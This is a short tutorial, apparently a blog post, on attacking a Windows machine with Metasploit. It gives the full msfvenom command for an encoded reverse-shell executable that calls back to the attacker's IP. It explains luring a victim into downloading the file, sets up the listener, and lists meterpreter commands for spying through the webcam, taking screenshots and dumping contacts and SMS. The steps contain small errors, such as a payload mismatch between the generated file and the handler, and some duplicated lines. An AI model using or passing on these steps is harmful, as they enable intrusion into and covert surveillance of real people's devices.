Metasploit reverse attack on windows
We are going to make payload to do reverse attack on Windows system.
Because Windows 10 has patched, exploit will not work. We are going to make payload to do the attack.
Turn off the firewall on Windows with administrator's privilege.
Attacker : kali, IP is 10.211.55.9
tools : msfconsole, msfvenom
Step 1: construct payload with msfvenom
msfvenom -a x86 -p windows/shell/reverse_tcp LHOST=10.211.55.9 LPORT=4444 -e x86/shikata_ga_nai -f exe -o /tmp/2.exe
LHOST is my local host, kali
LPORT is my local port
The generated file is /tmp/2.exe
Step 2: make the victim to download the malicious file:
Launch a web service on kali.
On Windows machine, we type the kali's IP in the browser, and download 2.exe.
Step 3: launch the attack
Launch msfconsole
set the payload and handler
start the attack with 'run'
set the payload and handler
start the attack with 'run'
$ msfconsole
msf5> use exploit/multi/handler
msf5> set payload windows/meterpreter/reverse_tcp
msf5> show options
msf5> run

Now, the connection has been bulit successfully!
Step 4: type the command
Type the command on kali
To open the camera on the victim's machine: webcam_stream
There are also some other command:
screenshot : take a screenshot and saved on the attackers' machine.
dump_contacts : exports the phone
dump_sms : exports the information
webcam_list :lists cameras
webcam_stream :turns on the camera
webcam_snap : take a photo
webcam_chat : Video call
ps :lists all processes
activity_start :starts other applications
check_root : checks for root.
Ps: this can also be done on a phone.




